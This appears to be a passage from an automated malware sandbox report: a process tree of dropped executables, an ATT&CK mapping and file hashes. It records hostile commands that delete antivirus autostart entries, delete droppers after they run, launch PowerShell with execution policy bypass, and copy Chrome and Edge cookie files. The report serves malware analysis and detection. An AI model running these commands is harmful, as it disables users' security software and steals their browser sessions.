"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )5⤵
-
C:\Users\Admin\Documents\KoPeYBuvo733q7UCJjfRTuUX.exe"C:\Users\Admin\Documents\KoPeYBuvo733q7UCJjfRTuUX.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\OPWlnGyroSHxDQ_wZGPbuNd9.exe"C:\Users\Admin\Documents\OPWlnGyroSHxDQ_wZGPbuNd9.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3868054249.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\3868054249.exe"C:\Users\Admin\AppData\Local\Temp\3868054249.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\3868054249.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "OPWlnGyroSHxDQ_wZGPbuNd9.exe" /f & erase "C:\Users\Admin\Documents\OPWlnGyroSHxDQ_wZGPbuNd9.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "OPWlnGyroSHxDQ_wZGPbuNd9.exe" /f4⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\0zGx21mqKcrhzgQvyLnP27tc.exe"C:\Users\Admin\Documents\0zGx21mqKcrhzgQvyLnP27tc.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\0zGx21mqKcrhzgQvyLnP27tc.exe"C:\Users\Admin\Documents\0zGx21mqKcrhzgQvyLnP27tc.exe" -q3⤵
-
C:\Users\Admin\Documents\gUw_5v6MyOSdFUmlED0sSYGX.exe"C:\Users\Admin\Documents\gUw_5v6MyOSdFUmlED0sSYGX.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\GUW_5V~1.TMP,S C:\Users\Admin\DOCUME~1\GUW_5V~1.EXE3⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\GUW_5V~1.TMP,qVlQamhN4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpBE99.tmp.ps1"5⤵
-
C:\Users\Admin\Documents\RPv93RATAbV5ms0W7yHyDhb0.exe"C:\Users\Admin\Documents\RPv93RATAbV5ms0W7yHyDhb0.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7155564.exe"C:\Users\Admin\AppData\Roaming\7155564.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\7853832.exe"C:\Users\Admin\AppData\Roaming\7853832.exe"3⤵
-
C:\Users\Admin\Documents\THSu_hUno2e7fR1mrUc35kFd.exe"C:\Users\Admin\Documents\THSu_hUno2e7fR1mrUc35kFd.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im THSu_hUno2e7fR1mrUc35kFd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\THSu_hUno2e7fR1mrUc35kFd.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im THSu_hUno2e7fR1mrUc35kFd.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\rifsDaWKZxeS5ZFIoZ7isMjU.exe"C:\Users\Admin\Documents\rifsDaWKZxeS5ZFIoZ7isMjU.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\5QoqdqalDYiVHohiBv1upDn7.exe"C:\Users\Admin\Documents\5QoqdqalDYiVHohiBv1upDn7.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 6603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 6723⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 7803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 8163⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 11243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 10843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 12203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 12323⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "5QoqdqalDYiVHohiBv1upDn7.exe" /f & erase "C:\Users\Admin\Documents\5QoqdqalDYiVHohiBv1upDn7.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "5QoqdqalDYiVHohiBv1upDn7.exe" /f4⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\09u41BRyCbpaRmp9ZoFCWB1Y.exe"C:\Users\Admin\Documents\09u41BRyCbpaRmp9ZoFCWB1Y.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7853206.exe"C:\Users\Admin\AppData\Roaming\7853206.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\6989996.exe"C:\Users\Admin\AppData\Roaming\6989996.exe"3⤵
-
C:\Users\Admin\Documents\rCgsiTgSjH1G8AbCse9Pm0gX.exe"C:\Users\Admin\Documents\rCgsiTgSjH1G8AbCse9Pm0gX.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj75BF.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj75BF.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj75BF.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj75BF.tmp\tempfile.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj75BF.tmp\tempfile.ps1"3⤵
-
C:\Users\Admin\Documents\N8jefQkPfDV25m41k4hK0H_N.exe"C:\Users\Admin\Documents\N8jefQkPfDV25m41k4hK0H_N.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\IBu4R0poZO6JyKfv1JsKU3_h.exe"C:\Users\Admin\Documents\IBu4R0poZO6JyKfv1JsKU3_h.exe"2⤵
-
C:\Users\Admin\Documents\C_OQIsuUWUjknkNy5pi7n0ih.exe"C:\Users\Admin\Documents\C_OQIsuUWUjknkNy5pi7n0ih.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\uaiLAk6oxeQEcgP0rOjQpGxz.exe"C:\Users\Admin\Documents\uaiLAk6oxeQEcgP0rOjQpGxz.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KO7EE.tmp\uaiLAk6oxeQEcgP0rOjQpGxz.tmp"C:\Users\Admin\AppData\Local\Temp\is-KO7EE.tmp\uaiLAk6oxeQEcgP0rOjQpGxz.tmp" /SL5="$301F4,138429,56832,C:\Users\Admin\Documents\uaiLAk6oxeQEcgP0rOjQpGxz.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SQDOM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-SQDOM.tmp\Setup.exe" /Verysilent4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"5⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" /quiet SILENT=1 AF=715 BF=7155⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628405499 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"5⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"5⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PGSKL.tmp\GameBoxWin32.tmp"C:\Users\Admin\AppData\Local\Temp\is-PGSKL.tmp\GameBoxWin32.tmp" /SL5="$500E8,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8NS8O.tmp\Daldoula.exe"C:\Users\Admin\AppData\Local\Temp\is-8NS8O.tmp\Daldoula.exe" /S /UID=burnerch27⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\6252490.exe"C:\Users\Admin\AppData\Roaming\6252490.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\3888960.exe"C:\Users\Admin\AppData\Roaming\3888960.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\4752796.exe"C:\Users\Admin\AppData\Roaming\4752796.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\7178110.exe"C:\Users\Admin\AppData\Roaming\7178110.exe"6⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\7485f327f29d4bc1b5b694f7eee3c9d7 /t 2840 /p 30321⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 335EFB09CB84D5FCC4F8AE290A9F66A5 C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D1618AE1A830D553A69303E6EBAF4F47 C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A06455DD71FADE9211FE93B46B9221E02⤵
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Defense Evasion
Modify Registry
2Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Company\NewProduct\customer3.exeMD5
1daac0c9a48a79976539b0722f9c3d3b
SHA1843218f70a6a7fd676121e447b5b74acb0d87100
SHA256e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf
SHA5122259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc
-
C:\Program Files (x86)\Company\NewProduct\customer3.exeMD5
1daac0c9a48a79976539b0722f9c3d3b
SHA1843218f70a6a7fd676121e447b5b74acb0d87100
SHA256e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf
SHA5122259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exeMD5
aed57d50123897b0012c35ef5dec4184
SHA1568571b12ca44a585df589dc810bf53adf5e8050
SHA256096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e
SHA512ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exeMD5
aed57d50123897b0012c35ef5dec4184
SHA1568571b12ca44a585df589dc810bf53adf5e8050
SHA256096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e
SHA512ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeMD5
3c7117f96c0c2879798a78a32d5d34cc
SHA1197c7dea513f8cbb7ebc17610f247d774c234213
SHA2566e17c993f42fcc005867e0fd33f98cae32726571d18f6dd8b9b06cefb82de162
SHA512b89573ac6cbbe132c0c4bac009904cba6d5fda9b4d4eebe2d9552f2451acdd8b7b8e8dce663b26f6541c9c124eb5b9f468efd23b35a28047b0cb942f3a90c122
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeMD5
3c7117f96c0c2879798a78a32d5d34cc
SHA1197c7dea513f8cbb7ebc17610f247d774c234213
SHA2566e17c993f42fcc005867e0fd33f98cae32726571d18f6dd8b9b06cefb82de162
SHA512b89573ac6cbbe132c0c4bac009904cba6d5fda9b4d4eebe2d9552f2451acdd8b7b8e8dce663b26f6541c9c124eb5b9f468efd23b35a28047b0cb942f3a90c122
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer.exeMD5
50a833d4031bc5d73968bb09985c9af1
SHA10cadd71afeb846c01aa0bbe7534307a06fc924db
SHA256db871a0f3c13504b0dd296a91bd03132a031ed12c8449c3f2cdde438a8615197
SHA512a6b9d2b34c30bce4752b3fea27b7bd7a76104ce3b5f2c6ebaacb33682c05ae4f2eaeb061ddd6beb34d2633b20cce341f7a1a5ed9835d12b397cd0a686d413735
-
C:\ProgramData\Runtimebroker.exeMD5
8ba11d0fafc5b4d9d27d968999f27c54
SHA152295ff966014347823f80f3f508c725b151eb1b
SHA2569e4aa9c24018878c94ae50c7d0933d3bf3949b851774fd4dd9c9de1e6d6ef4a5
SHA512c1d5090b2d23a2e4aa68f050993ed90c33ac81e9020be66ec9f64ef45ad444d5b350eb2de37f868d8d70cc9977a7e225b12239a5f538ede2df67df071029299c
-
C:\ProgramData\Runtimebroker.exeMD5
8ba11d0fafc5b4d9d27d968999f27c54
SHA152295ff966014347823f80f3f508c725b151eb1b
SHA2569e4aa9c24018878c94ae50c7d0933d3bf3949b851774fd4dd9c9de1e6d6ef4a5
SHA512c1d5090b2d23a2e4aa68f050993ed90c33ac81e9020be66ec9f64ef45ad444d5b350eb2de37f868d8d70cc9977a7e225b12239a5f538ede2df67df071029299c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27MD5
b1984c142d178dd4a7d8bc5472e766a1
SHA1e15c3d475cfb3ace05f288ff4931d606d979677a
SHA25635e33ce28b54798ff9a160924bf9eb3717e0fe4fb1c1c150d6875715e6bc52f5
SHA512936150262ac34949f68df02e809a8733ace1aa0d924f967cf226c0b23f45c80ee277c75d9b1d41f5131fcbe09047a6d3b7f84cdf86d6018ea5731465e605d0e8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27MD5
f6fe439cb18763e0b2ee334bd7e4259b
SHA1d8e8e0e0809e60c4803c130794c049fbec98b43f
SHA2567f19ca94b51b15bae08f441b4a03d92b5734f07a26db90e0f44b6706f0dac113
SHA5122b0688ecd5dc9dc6f2e2e79a858649ed8780b648699b8461c4fc7e7406f5f96b4b3f6126503c03c3282e8833bbefb0017a4b525316d4300626d9c1fe27411d5a
-
C:\Users\Admin\AppData\Local\Temp\6131c36b-2744-4acf-82fa-983cbc3cb672\AdvancedRun.exeMD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA11b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA5123ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA11b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA5123ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
C:\Users\Admin\AppData\Roaming\7155564.exeMD5
faa4540e9de679f1ccebd8919086707b
SHA1244b5ca95e41f263e8357bb9ca5343623f07afe3
SHA256c1dd8fb190e95d8530a42bec831fcffbfdad0b6091d79008dc6828ef1587b44e
SHA51265f0d2baf3a3db9c77ed4607978e1ddae1513b60b1678fcab08bde0e1417f8381d62be2c546c9c674d3206fd5711e7482286831be93ccd8fd0abd137b2cab9ac
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lightening Media Player.lnkMD5
cb5747870fed9da28821c27791522090
SHA19f3653ecb1511ba1b4b5f7ed10946f91e11aa328
SHA25630fb4984c5caf62ba3db6fbad714014c7450b99701c4a204c6030a3733efef86
SHA5128a4739afcc57b1d1574e8a51f39fa535ea1ecd8f65953e72184993a109f558ab970ae4c121961e09b2997071022c27ae5b0d0cfafaedf2ed862ca5f47bdec1d5
-
C:\Users\Admin\DOCUME~1\GUW_5V~1.TMPMD5
5f6b54c7faf0792d8a0865bc8fa7cb9b
SHA1bd388b180395969175ae397a900ed5e4f544f076
SHA2560341215d8c5cf17b21d715cb6ba53addb03faa735ee888d107adc4497a78982f
SHA5129ce88b2b81c3c868e3cbbe11ea7f5ebdc72c209b66bc8006ac2f6068a5c216703ec82659a98db28780d517cabd7da7be2f6f22a160b44d81664c82b09e67c421
-
C:\Users\Admin\Desktop\Lightening Media Player.lnkMD5
daa4b6fa2cdc4b24175bad5eaa715d14
SHA1538b353d72d633e2222608d6fa893bb47cbcfafb
SHA256ced252e747d7c8418b76b1f23224c7603013a48b84d5f10dbd8062388edba9bf
SHA512531d8b06f1c979e8700479f0e6389c7869af90377f3f615cc5d4b35fbd184356c69fd2153b64ef3dc0f085e3a9c76e6f7e0498bcab141535297208775b82a107
-
C:\Users\Admin\Documents\09u41BRyCbpaRmp9ZoFCWB1Y.exeMD5
f727ff82991b8be8fa3cb310d97838bc
SHA1f47252c7df601facaf5da1b6105d9f8cf1c958bf
SHA25652769186647b50add7fb7f60d66df5c84838790bf57759be83fa39fde969586f
SHA512bcd2979e2d4ecc7f7d8579214fe6891255bf53e18336f7494a9eea986e609da921329c49ed19182d4b7efe06fbac65dc1eca22029c785ece06be1d956e3d04d8
-
C:\Users\Admin\Documents\09u41BRyCbpaRmp9ZoFCWB1Y.exeMD5
f727ff82991b8be8fa3cb310d97838bc
SHA1f47252c7df601facaf5da1b6105d9f8cf1c958bf
